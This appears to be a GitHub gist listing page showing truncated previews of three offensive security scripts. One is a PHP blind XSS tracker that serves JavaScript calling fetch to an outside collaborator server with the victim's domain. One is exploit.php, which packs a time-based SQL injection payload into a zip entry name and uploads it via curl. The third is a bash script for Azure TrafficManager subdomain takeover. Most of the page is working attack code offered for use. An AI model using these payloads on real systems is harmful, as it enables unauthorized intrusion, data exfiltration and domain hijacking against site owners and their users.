mcipekci
mcipekci
/ gist:73a7dbe3eba8a416a38dc592933df1f3
Created
March 13, 2025 16:07
php blind xss tracker for burp collab
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| header("Access-Control-Allow-Origin: *"); | |
| header("Access-Control-Allow-Credentials: true"); | |
| header("Access-Control-Allow-Methods: GET, POST, OPTIONS"); | |
| header("Access-Control-Allow-Headers: DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range"); | |
| header("Access-Control-Expose-Headers: Content-Length,Content-Range"); | |
| if ($_SERVER["HTTP_SEC_FETCH_DEST"] == "script") { | |
| header("Content-Type: text/javascript"); | |
| echo "fetch('//collabserver/?url='+document.domain);"; | |
| echo "alert(document.domain)"; |
mcipekci
/ exploit.php
Created
March 21, 2023 13:35
Exploiting SQL injection via unzipped file contents
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Prepare File | |
| $file = tempnam("/tmp", "zip"); | |
| $zip = new ZipArchive(); | |
| $zip->open($file, ZipArchive::OVERWRITE); | |
| // Add file name with SQLi payload | |
| $zip->addFromString("'+(CASE WHEN 1=".$_GET['value']." THEN 1 ELSE sleep(10) END)+'", ""); | |
| // Close and send to the server | |
| $zip->close(); | |
| $cf = new CURLFile($file); |
mcipekci
/ trafficmanager.sh
Created
March 31, 2020 19:19
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "--------------------------------------" | |
| echo "Trying to takeover $1 on Azure TrafficManager" | |
| domainName=$1.trafficmanager.net | |
| echo "Checking DNS state for $domainName" | |
| dnsState=$(dig $domainName @tm2.msft.net | grep NXDOMAIN) | |
| if [[ ! -z $dnsState ]]; then | |
| echo "$1 is pointing NXDOMAIN, trying to create it..." | |
| NEW_UUID=$(echo $1 | sed 's/\.//g') | |
| result=$(azure network traffic-manager profile create --name $NEW_UUID -d $domainName -m Performance -p http -p https -r "/" --json 2>/dev/null | jq .profile.domainName | sed 's/\"//g') |